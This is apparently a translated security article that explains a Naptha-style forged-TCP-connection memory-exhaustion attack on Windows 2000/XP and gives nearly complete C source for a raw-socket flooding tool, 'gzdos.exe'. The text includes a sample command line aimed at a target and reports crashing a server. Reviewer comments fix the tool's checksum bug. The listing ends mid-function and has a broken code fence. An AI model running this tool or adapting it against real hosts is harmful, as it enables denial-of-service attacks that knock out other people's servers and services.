Test platform: VC 6.0 on Windows 2000 Server. Target platforms: Windows 2000 and Windows XP.

The idea is inspired by the Naptha attack. I wanted to extend the forged-connection technique so that it can be run from an ordinary PC, without the preconditions that Naptha is bound by. I spent real time studying what is written below — it is not nonsense. I am publishing it now to share with everyone; it is not very mature yet, and I hope to discuss it with you.

About Naptha: a write-up of Naptha was published in 2000. Why does it use a LAN-based setup? Partly to stay better hidden, but there is a more important reason: the attacking host must not process the target's second-handshake packet (the SYN/ACK) with its own stack, otherwise the attacking system will emit an RST and tear down the forged connection. Beyond that, Naptha as published does not have much impact on Windows — the question is how much memory Windows consumes per connection. If the retransmission counter runs again, the data is transferred again.

Flow (A is the attacker, C is the target):

```
A  SYN        -------->  C
A  SYN, ACK   <--------  C
A  ACK        -------->  C
A  Send Data  -------->  C
A  ACK        <--------  C
A  Send Data  -------->  C
A  ACK        <--------  C
...
```

Test results: against an ordinary ephemeral port such as 1025 it is quite effective — memory keeps rising until the machine stops responding and finally crashes; 20 minutes is enough to drag down an Internet-café server. Against port 80, which has a maximum-connections limit, the effect is not very obvious: about 40 MB of memory is consumed and released repeatedly, leaving a large number of connections in FIN_WAIT_1 and ESTABLISHED. Other ports I could not test conveniently because of my limited environment; friends who can, please tell me your results. Discussion welcome.

So two problems have to be solved:

1. Drop this machine's own RST packets with a hook. Refer to flashsky's article on implementing an IP packet filter with a DIS filter-hook driver, http://www.xfocus.net/articles/200210/457.html — only one line of code needs to change. Change `if (Packet[13] == 0x2 && SendInterfaceIndex == INVALID_PF_IF_INDEX)` to `if (Packet[13] == 0x4 && SendInterfaceIndex != INVALID_PF_IF_INDEX)`. (Byte 13 of the TCP header is the flags byte: 0x02 is SYN and 0x04 is RST, and a valid send-interface index means the packet is outbound — so the original filter matched inbound SYNs, while the modified one matches the RSTs this host tries to send, exactly the packets that would tear down the forged connection.) See the original article; it is very detailed.

2. Forging the data transfer. Sniffer analysis shows that the forged connection must also carry TCP options in its SYN, negotiating things such as the segment size the peer may receive; otherwise, even though the connection is established, the target does not acknowledge the data — and if the target will not accept data, you cannot make it consume memory. A plain SYN scan, like Naptha's connection request, sends a 20-byte TCP header with no options. The option bytes a Windows 2000 host sends vary: my Windows 2000 sends 8 bytes, a friend's Windows 2000 sends 12. Taking my machine's 8 bytes as the example, the TCP header is 28 bytes long, so `tcp_head.th_lenres = 0x70` (7 words, in the high nibble).

One more point to note is how the TCP checksum is calculated.
```c
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long cksum = 0;
    while (size > 1) {
        cksum += *buffer++;
        size -= sizeof(USHORT);
    }
    if (size) {
        cksum += *(UCHAR *)buffer;
    }
    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >> 16);
    return (USHORT)(~cksum);
}
```

When there is data behind the 20-byte TCP header, the value Windows 2000 expects is not what this routine produces; after analysis it turns out to depend on the data length. For example, with a 20-byte IP header, a 20-byte TCP header and 2 bytes of data, the checksum computed as for plain TCP is 0x4523, but the system computes 0x4323, so the code does:

```c
tcpHeader.th_sum = checksum((USHORT *)szSendBuf, sizeof(psdHeader) + sizeof(tcpHeader) + dwSize);
tcpHeader.th_sum = htons(ntohs(tcpHeader.th_sum) - (USHORT)dwSize);
```

where `dwSize` is the length of the data carried. Without this the target does not accept the forged packet, and then its memory cannot be consumed.

(Reviewer's note: this is not a Windows peculiarity. RFC 793 defines the pseudo-header "TCP length" field as the length of the header *plus options and data*, whereas the listing below fills `psdHeader.tcpl` with `sizeof(tcpHeader)`, i.e. always 20. The 2-byte example shows it directly: 0x4523 − 0x4323 = 0x0200, which is the value 2 seen through a byte-swapped read. Subtracting `dwSize` from the checksum afterwards is the one's-complement equivalent of adding `dwSize` to the pseudo-header length, except that a plain 16-bit subtraction has no end-around borrow, so the result is off by one whenever the unadjusted checksum is smaller than `dwSize`. Setting `psdHeader.tcpl = htons(sizeof(tcpHeader) + <option or data length>)` and dropping the subtraction is the correct fix.)

Here is the test code. Given the effect — and possible harm — of this program, it is deliberately not written as a convenient tool: you have to sniff the option bytes by hand and then type them on the command line, for example

    gzdos.exe 192.168.248.128 1025 020405b401010402 1000 65534

(target IP, target port, TCP option bytes in hex, pause between source ports in milliseconds, starting source port). The option string above decodes as MSS 1460 (`02 04 05 b4`), two NOPs (`01 01`) and SACK-permitted (`04 02`).

gzdos.exe source code (the header name of the fourth `#include` was lost in extraction and is left blank below):

```c
#include "stdio.h"
#include "winsock2.h"
#include "windows.h"
#include
```
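#include "wchar.h"
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "ws2_32.lib")

/*
 * gzdos.exe — Naptha-style forged-connection memory-exhaustion test
 * (see the accompanying article). Every packet is built by hand and sent
 * through a raw socket with IP_HDRINCL; replies are observed through a second
 * raw socket switched to SIO_RCVALL (receive-all) mode. The article explains
 * that the local stack's own RST replies must additionally be dropped by a
 * filter driver — nothing in this file does that.
 *
 * NOTE(review): raw sockets with IP_HDRINCL need administrator rights, and the
 * original targets 32-bit Windows 2000 (the pointer <-> DWORD casts below
 * assume 32-bit pointers). For authorized testing only.
 */

/* Receive-all ioctl for the sniffer socket (normally declared in <mstcpip.h>). */
#define SIO_RCVALL _WSAIOW(IOC_VENDOR, 1)

/* Initial sequence number of every forged SYN. A SYN/ACK is recognised as a
 * reply to one of ours when its acknowledgement number equals FORGED_ISN + 1. */
#define FORGED_ISN      0x00198288UL
/* TCP options occupy at most 40 bytes (the data-offset field caps at 15 words). */
#define MAX_TCP_OPT_LEN 40
/* Size of the payload pushed on every forged connection. */
#define DATA_LEN        799
/* Largest option/data tail the senders will place behind a TCP header. */
#define MAX_TAIL_LEN    1024
/* Port the sniffer socket is bound to (any value works in receive-all mode). */
#define SNIFFER_PORT    8288
/* Advertised receive window of every forged segment. */
#define FORGED_WINDOW   0x4470

char   *ATTACKIP   = "192.168.248.128"; /* target IP, dotted (argv[1]) */
USHORT  ATTACKPORT = 135;               /* target port, host order (argv[2]) */
USHORT  StartPort  = 1;                 /* first forged source port (argv[5]) */
int     SLEEPTIME  = 2000;              /* pause between source ports, ms (argv[4]) */
UCHAR  *optbuf     = NULL;              /* TCP option bytes decoded from argv[3] */
char   *psend      = NULL;              /* payload sent on every forged connection */
DWORD   len        = 0;                 /* strlen(psend) */
USHORT  optlen     = 0;                 /* number of bytes in optbuf */

typedef struct ip_head {
    unsigned char  h_verlen;            /* version (high nibble) + header length in words */
    unsigned char  tos;
    unsigned short total_len;
    unsigned short ident;
    unsigned short frag_and_flags;
    unsigned char  ttl;
    unsigned char  proto;
    unsigned short checksum;
    unsigned int   sourceIP;
    unsigned int   destIP;
} IPHEADER;

typedef struct tcp_head {
    USHORT        th_sport;
    USHORT        th_dport;
    unsigned int  th_seq;
    unsigned int  th_ack;
    unsigned char th_lenres;            /* data offset in words (high nibble) + reserved */
    unsigned char th_flag;
    USHORT        th_win;
    USHORT        th_sum;
    USHORT        th_urp;
} TCPHEADER;

/* Pseudo-header prepended to the segment when computing the TCP checksum. */
typedef struct tsd_hdr {
    unsigned long  saddr;
    unsigned long  daddr;
    char           mbz;
    char           ptcl;
    unsigned short tcpl;                /* TCP length: header + options + data */
} PSDHEADER;

typedef struct attack_obj {
    DWORD  dwIP;                        /* target address, network order */
    USHORT uAttackPort[11];             /* zero-terminated target ports, network order */
    struct attack_obj *next;
} atobj;

atobj *listattackobj = 0;

BOOL  InitStart(void);
DWORD GetHostIP(void);
USHORT checksum(USHORT *buffer, int size);
DWORD WINAPI ThreadSynFlood(LPVOID lp);
void  SendData(DWORD SEQ, DWORD ACK, USHORT SPort, USHORT APort, DWORD SIP, DWORD AIP,
               char *pBuf, BOOL Isdata, DWORD dwSize);
DWORD WINAPI ListeningFunc(LPVOID lpvoid);
void  banner(void);
void  debugip(DWORD dwip);
void  ConvertOpt(char *pu);

SOCKET sock = INVALID_SOCKET;           /* raw send socket, set up by InitStart */

/* Parses s as a decimal number in [lo, hi]. Returns 0 and stores it in *out,
 * or -1 if s is empty, has trailing junk or is out of range. */
static int parse_number(const char *s, unsigned long lo, unsigned long hi, unsigned long *out)
{
    char *end = NULL;
    unsigned long v;

    if (s == NULL || *s == '\0') {
        return -1;
    }
    v = strtoul(s, &end, 10);
    if (*end != '\0' || v < lo || v > hi) {
        return -1;
    }
    *out = v;
    return 0;
}

/* Computes the TCP checksum of tcp followed by tail (options and/or data)
 * under the pseudo-header psd and stores it in *out. The pseudo-header TCP
 * length is set to header + tail, as RFC 793 requires (the original filled it
 * with the bare header size and patched the checksum afterwards), and th_sum
 * is zeroed in a private copy before summing. Returns 0 on success, -1 if
 * taillen exceeds MAX_TAIL_LEN. */
static int tcp_checksum(const PSDHEADER *psd, const TCPHEADER *tcp,
                        const void *tail, size_t taillen, USHORT *out)
{
    char scratch[sizeof(PSDHEADER) + sizeof(TCPHEADER) + MAX_TAIL_LEN];
    PSDHEADER p = *psd;
    TCPHEADER t = *tcp;
    size_t total = sizeof(p) + sizeof(t) + taillen;

    if (taillen > MAX_TAIL_LEN) {
        return -1;
    }
    p.tcpl = htons((USHORT)(sizeof(t) + taillen));
    t.th_sum = 0;
    memcpy(scratch, &p, sizeof(p));
    memcpy(scratch + sizeof(p), &t, sizeof(t));
    if (taillen > 0) {
        memcpy(scratch + sizeof(p) + sizeof(t), tail, taillen);
    }
    *out = checksum((USHORT *)scratch, (int)total);
    return 0;
}

/* Usage: gzdos.exe <target ip> <target port> <tcp option bytes in hex> <sleep ms> [start port]
 * Validates the arguments, initialises Winsock and the raw send socket, starts
 * one sniffer thread per local address and then runs the SYN flood on the
 * main thread. Returns -1 on any setup error. */
int main(int argc, char *argv[])
{
    unsigned long value = 0;
    char *optbuftemp = NULL;
    char hostname[255] = {0};
    struct hostent *lp = NULL;
    int i = 0;

    banner();

    /* Payload: DATA_LEN bytes of '8' (0x38), NUL-terminated so strlen() works. */
    psend = (char *)malloc(DATA_LEN + 1);
    if (psend == NULL) {
        printf("out of memory!\n");
        return -1;
    }
    memset(psend, 0x38, DATA_LEN);
    psend[DATA_LEN] = 0;
    len = (DWORD)strlen(psend);

    if (argc < 5) {
        printf("input error!\n");
        return -1;
    }

    ATTACKIP = strdup(argv[1]);
    if (ATTACKIP == NULL || inet_addr(ATTACKIP) == INADDR_NONE) {
        printf("bad target IP!\n");
        return -1;
    }
    if (parse_number(argv[2], 1, 65535, &value) != 0) {
        printf("bad target port!\n");
        return -1;
    }
    ATTACKPORT = (USHORT)value;

    /* Option bytes are given as hex pairs; ConvertOpt fills optbuf/optlen.
     * A TCP data offset is counted in 32-bit words, so the length must be a
     * multiple of 4 and at most 40 bytes, otherwise the header would be cut. */
    optbuftemp = strdup(argv[3]);
    if (optbuftemp == NULL) {
        printf("out of memory!\n");
        return -1;
    }
    ConvertOpt(optbuftemp);
    if (optbuf == NULL || optlen > MAX_TCP_OPT_LEN || (optlen % 4) != 0) {
        printf("option bytes must be a multiple of 4 and at most %d bytes!\n", MAX_TCP_OPT_LEN);
        return -1;
    }

    if (parse_number(argv[4], 0, 0x7fffffffUL, &value) != 0) {
        printf("bad sleep time!\n");
        return -1;
    }
    SLEEPTIME = (int)value;
    if (argc >= 6) {
        if (parse_number(argv[5], 1, 65534, &value) != 0) {
            printf("bad start port!\n");
            return -1;
        }
        StartPort = (USHORT)value;
    }

    if (InitStart() == FALSE) {
        return -1;
    }

    /* One sniffer thread per local address so a SYN/ACK arriving on any
     * interface is seen. gethostbyname() may fail — check before walking. */
    gethostname(hostname, sizeof(hostname));
    lp = gethostbyname(hostname);
    if (lp == NULL || lp->h_addr_list[0] == NULL) {
        printf("cannot resolve local address!\n");
        return -1;
    }
    while (lp->h_addr_list[i] != NULL) {
        DWORD dwip = *(DWORD *)lp->h_addr_list[i++];
        HANDLE h = CreateThread(NULL, 0, ListeningFunc, (LPVOID)dwip, 0, NULL);
        if (h == NULL) {
            printf("create ListeningFunc thread false!\n");
            return -1;
        }
        CloseHandle(h);                 /* the thread keeps running; it is never joined */
        Sleep(500);
    }

    ThreadSynFlood(NULL);
    Sleep(5555555);                     /* keep the sniffer threads alive */
    return 0;
}

/* Sets up Winsock, the single-entry attack list and the raw send socket.
 * Returns TRUE on success; on failure prints the step that failed and
 * returns FALSE. */
BOOL InitStart(void)
{
    BOOL flag = TRUE;
    int nTimeOver = 2000;
    WSADATA wsaData;

    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        printf("WSAStartup error!\n");
        return FALSE;
    }

    listattackobj = (atobj *)calloc(1, sizeof(atobj));
    if (listattackobj == NULL) {
        printf("out of memory!\n");
        return FALSE;
    }
    listattackobj->dwIP = inet_addr(ATTACKIP);
    listattackobj->uAttackPort[0] = htons(ATTACKPORT);
    listattackobj->uAttackPort[1] = 0;  /* zero terminates the port list */
    listattackobj->next = NULL;

    /* Raw socket with IP_HDRINCL: the IP header is supplied by us.
     * NOTE(review): the socket() arguments were garbled in the source;
     * IPPROTO_IP matches the sniffer socket below — confirm against the original. */
    sock = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
    if (sock == INVALID_SOCKET) {
        printf("socket setup error!\n");
        return FALSE;
    }
    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
        printf("setsockopt IP_HDRINCL error!\n");
        return FALSE;
    }
    /* Send timeout so a blocked sendto() cannot wedge the flood loop. */
    if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&nTimeOver, sizeof(nTimeOver)) == SOCKET_ERROR) {
        printf("setsockopt SO_SNDTIMEO error!\n");
        return FALSE;
    }
    return TRUE;
}

/* Sends one forged SYN (carrying the sniffed TCP options) from every source
 * port in [StartPort, 65535) to each target port, pausing SLEEPTIME ms after
 * each source port. SYN/ACK replies are handled by ListeningFunc. lp is
 * unused. Returns 0 when the target list is exhausted, 1 on a send error. */
DWORD WINAPI ThreadSynFlood(LPVOID lp)
{
    atobj *pAtObj = listattackobj;
    SOCKADDR_IN addr_in;
    IPHEADER ipHeader;
    TCPHEADER tcpHeader;
    PSDHEADER psdHeader;
    char szSendBuf[1024] = {0};
    size_t pktlen;

    (void)lp;
    if (optlen > MAX_TCP_OPT_LEN) {     /* keeps the memcpy below inside szSendBuf */
        printf("option bytes too long!\n");
        return 1;
    }
    pktlen = sizeof(ipHeader) + sizeof(tcpHeader) + optlen;

    while (pAtObj != NULL) {
        memset(&addr_in, 0, sizeof(addr_in));
        addr_in.sin_family = AF_INET;
        addr_in.sin_addr.S_un.S_addr = pAtObj->dwIP;

        /* IPv4, 5-word header, DF set, TTL 128; the stack fills the IP checksum. */
        ipHeader.h_verlen = (unsigned char)((4 << 4) | (sizeof(ipHeader) / 4));
        ipHeader.tos = 0;
        ipHeader.total_len = htons((USHORT)pktlen);
        ipHeader.ident = 1;
        ipHeader.frag_and_flags = 0x0040;
        ipHeader.ttl = 0x80;
        ipHeader.proto = IPPROTO_TCP;
        ipHeader.checksum = 0;
        ipHeader.destIP = pAtObj->dwIP;
        ipHeader.sourceIP = GetHostIP();

        /* SYN with data offset = 5 words + options. */
        tcpHeader.th_ack = 0;
        tcpHeader.th_lenres = (unsigned char)((optlen / 4 + 5) << 4);
        tcpHeader.th_flag = 0x02;
        tcpHeader.th_win = htons(FORGED_WINDOW);
        tcpHeader.th_urp = 0;
        tcpHeader.th_seq = htonl(FORGED_ISN);

        psdHeader.saddr = ipHeader.sourceIP;
        psdHeader.daddr = ipHeader.destIP;
        psdHeader.mbz = 0;
        psdHeader.ptcl = IPPROTO_TCP;
        psdHeader.tcpl = 0;             /* filled in by tcp_checksum */

        for (int l = StartPort; l < 65535; l++) {
            int k = 0;
            while (pAtObj->uAttackPort[k] != 0) {
                tcpHeader.th_dport = pAtObj->uAttackPort[k++];
                tcpHeader.th_sport = htons((USHORT)l);
                if (tcp_checksum(&psdHeader, &tcpHeader, optbuf, optlen, &tcpHeader.th_sum) != 0) {
                    printf("option bytes too long!\n");
                    return 1;
                }
                memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
                memcpy(szSendBuf + sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
                memcpy(szSendBuf + sizeof(ipHeader) + sizeof(tcpHeader), optbuf, optlen);
                if (sendto(sock, szSendBuf, (int)pktlen, 0,
                           (struct sockaddr *)&addr_in, sizeof(addr_in)) == SOCKET_ERROR) {
                    printf("send error!:%x\n", WSAGetLastError());
                    return 1;
                }
                printf("send OK %d\n", l);
            }
            Sleep(SLEEPTIME);
        }
        pAtObj = pAtObj->next;
    }
    return 0;
}

/* Returns the last IPv4 address gethostbyname() reports for this host, in
 * network byte order, or 0 if the lookup fails or yields no address (the
 * original indexed h_addr_list[-1] in that case). */
DWORD GetHostIP(void)
{
    char hostname[255] = {0};
    struct hostent *lp;
    int n = 0;

    gethostname(hostname, sizeof(hostname));
    lp = gethostbyname(hostname);
    if (lp == NULL || lp->h_addr_list[0] == NULL) {
        return 0;
    }
    while (lp->h_addr_list[n] != NULL) {
        n++;
    }
    return *(DWORD *)lp->h_addr_list[n - 1];
}

/* Internet (RFC 1071) one's-complement checksum over size bytes of buffer.
 * A trailing odd byte is added as if followed by a zero pad byte, which is
 * correct on little-endian hosts. The result is in memory order and can be
 * stored into a header field as-is. */
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long cksum = 0;

    while (size > 1) {
        cksum += *buffer++;
        size -= (int)sizeof(USHORT);
    }
    if (size) {
        cksum += *(UCHAR *)buffer;
    }
    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >> 16);
    return (USHORT)(~cksum);
}

/* Sniffer thread for one local address (passed as a DWORD in lpvoid). Opens a
 * raw socket in receive-all mode and, for every TCP segment from ATTACKIP:
 *  - on a SYN/ACK whose ack number is FORGED_ISN + 1 (a reply to our SYN),
 *    sends the third-handshake ACK and immediately a data segment;
 *  - on a pure ACK, sends another data segment starting at the acked byte.
 * Never returns normally; returns FALSE if the socket cannot be set up. */
DWORD WINAPI ListeningFunc(LPVOID lpvoid)
{
    SOCKET rawsock;
    SOCKADDR_IN addr_in = {0};
    DWORD rcvall = 1;
    DWORD bytesReturned = 0;
    DWORD target;

    rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
    if (rawsock == INVALID_SOCKET) {
        printf("sniffer socket setup error!\n");
        return FALSE;
    }
    /* Bind to the local IP; the port is irrelevant in receive-all mode. */
    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(SNIFFER_PORT);
    addr_in.sin_addr.S_un.S_addr = (DWORD)lpvoid;
    if (bind(rawsock, (struct sockaddr *)&addr_in, sizeof(addr_in)) == SOCKET_ERROR) {
        printf("bind false\n");         /* original called exit(0) here, killing the whole process */
        closesocket(rawsock);
        return FALSE;
    }
    if (WSAIoctl(rawsock, SIO_RCVALL, &rcvall, sizeof(rcvall), NULL, 0,
                 &bytesReturned, NULL, NULL) == SOCKET_ERROR) {
        printf("SIO_RCVALL error!:%x\n", WSAGetLastError());
        closesocket(rawsock);
        return FALSE;
    }

    target = inet_addr(ATTACKIP);
    while (TRUE) {
        SOCKADDR_IN from = {0};
        int fromlen = sizeof(from);
        char recvBuf[2048] = {0};       /* large enough for a full Ethernet-sized datagram */
        IPHEADER *ip;
        TCPHEADER *tcp;
        int ihl;
        int ret = recvfrom(rawsock, recvBuf, sizeof(recvBuf), 0, (struct sockaddr *)&from, &fromlen);

        if (ret == SOCKET_ERROR || ret < (int)sizeof(IPHEADER)) {
            continue;
        }
        ip = (IPHEADER *)recvBuf;
        if (ip->proto != IPPROTO_TCP || ip->sourceIP != target) {
            continue;
        }
        /* Locate the TCP header from the IP header length instead of assuming
         * 20 bytes, and make sure a whole TCP header was actually received. */
        ihl = (ip->h_verlen & 0x0f) * 4;
        if (ihl < (int)sizeof(IPHEADER) || ret < ihl + (int)sizeof(TCPHEADER)) {
            continue;
        }
        tcp = (TCPHEADER *)(recvBuf + ihl);

        if (tcp->th_flag == 0x12) {                     /* SYN+ACK */
            if (tcp->th_ack == htonl(FORGED_ISN + 1)) {
                DWORD ack = htonl(ntohl(tcp->th_seq) + 1);
                /* Complete the handshake, then push data at once. */
                SendData(tcp->th_ack, ack, tcp->th_dport, tcp->th_sport,
                         ip->destIP, ip->sourceIP, NULL, FALSE, 0);
                SendData(tcp->th_ack, ack, tcp->th_dport, tcp->th_sport,
                         ip->destIP, ip->sourceIP, psend, TRUE, len);
            }
        } else if (tcp->th_flag == 0x10) {              /* pure ACK: keep feeding data */
            /* NOTE(review): every pure ACK from the target is answered,
             * including ACKs of connections this tool did not create. */
            SendData(tcp->th_ack, tcp->th_seq, tcp->th_dport, tcp->th_sport,
                     ip->destIP, ip->sourceIP, psend, TRUE, len);
        }
    }
}

/* Sends one forged TCP segment from SIP:SPort to AIP:APort (all in network
 * order): PSH+ACK when Isdata is TRUE, a pure ACK otherwise, carrying dwSize
 * bytes of pBuf when pBuf is non-NULL. SEQ and ACK are the sequence and
 * acknowledgement numbers placed on the wire. Errors are printed, not
 * returned. */
void SendData(DWORD SEQ, DWORD ACK, USHORT SPort, USHORT APort, DWORD SIP, DWORD AIP,
              char *pBuf, BOOL Isdata, DWORD dwSize)
{
    SOCKADDR_IN addr_in;
    IPHEADER ipHeader;
    TCPHEADER tcpHeader;
    PSDHEADER psdHeader;
    char szSendBuf[sizeof(IPHEADER) + sizeof(TCPHEADER) + MAX_TAIL_LEN];
    size_t pktlen;

    if (pBuf == NULL) {
        dwSize = 0;                     /* nothing to carry */
    }
    if (dwSize > MAX_TAIL_LEN) {        /* the original copied dwSize bytes unchecked */
        printf("payload too long (%lu bytes)\n", (unsigned long)dwSize);
        return;
    }
    pktlen = sizeof(ipHeader) + sizeof(tcpHeader) + dwSize;

    memset(&addr_in, 0, sizeof(addr_in));
    addr_in.sin_family = AF_INET;
    addr_in.sin_port = APort;
    addr_in.sin_addr.S_un.S_addr = AIP;

    ipHeader.h_verlen = (unsigned char)((4 << 4) | (sizeof(ipHeader) / 4));
    ipHeader.tos = 0;
    ipHeader.total_len = htons((USHORT)pktlen);
    ipHeader.ident = 1;
    ipHeader.frag_and_flags = 0x0040;
    ipHeader.ttl = 0x80;
    ipHeader.proto = IPPROTO_TCP;
    ipHeader.checksum = 0;
    ipHeader.destIP = AIP;
    ipHeader.sourceIP = SIP;

    tcpHeader.th_sport = SPort;
    tcpHeader.th_dport = APort;
    tcpHeader.th_seq = SEQ;
    tcpHeader.th_ack = ACK;
    tcpHeader.th_lenres = (unsigned char)((sizeof(tcpHeader) / 4) << 4);
    tcpHeader.th_flag = Isdata ? 0x18 : 0x10;   /* PSH+ACK or plain ACK */
    tcpHeader.th_win = htons(FORGED_WINDOW);
    tcpHeader.th_sum = 0;
    tcpHeader.th_urp = 0;

    psdHeader.saddr = ipHeader.sourceIP;
    psdHeader.daddr = ipHeader.destIP;
    psdHeader.mbz = 0;
    psdHeader.ptcl = IPPROTO_TCP;
    psdHeader.tcpl = 0;                 /* filled in by tcp_checksum */
    if (tcp_checksum(&psdHeader, &tcpHeader, pBuf, dwSize, &tcpHeader.th_sum) != 0) {
        printf("payload too long (%lu bytes)\n", (unsigned long)dwSize);
        return;
    }

    memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
    memcpy(szSendBuf + sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
    if (dwSize > 0) {
        memcpy(szSendBuf + sizeof(ipHeader) + sizeof(tcpHeader), pBuf, dwSize);
    }

    if (sendto(sock, szSendBuf, (int)pktlen, 0,
               (struct sockaddr *)&addr_in, sizeof(addr_in)) == SOCKET_ERROR) {
        printf("send error!:%x\n", WSAGetLastError());
    } else if (pBuf != NULL) {
        printf("senddata OK %d\n", ntohs(SPort));
    } else {
        printf("sendack OK %d\n", ntohs(SPort));
    }
}

/* Prints the program banner and the usage line. */
void banner(void)
{
    printf("************************************************************\n");
    printf("Dog DoS test\n");
    printf("Maker by LionD8. QQ: 10415468. Email: liond8@eyou.com\n");
    printf("Welcome to my website: http://liond8.126.com\n");
    printf("For authorized testing only; the author bears no responsibility for any legal dispute\n");
    printf("************************************************************\n");
    printf("gzdos.exe <target ip> <target port> <tcp option bytes in hex> <sleep ms> [start port]\n");
}

/* Debug helper: prints a network-order IPv4 address in dotted form, no newline. */
void debugip(DWORD dwip)
{
    struct in_addr a = {0};
    a.S_un.S_addr = dwip;
    printf("%s", inet_ntoa(a));
}

/* Decodes the hex option string pu into the global optbuf/optlen (two hex
 * digits per byte). The definition continues past the end of this excerpt. */
void ConvertOpt(char *pu)
{
    int i = 0, lentemp;
    lentemp = strlen(pu);
    optlen = lentemp / 2;
    optbuf = (UCHAR *)malloc(optlen);
    int k = 0;
    for (i = 0; i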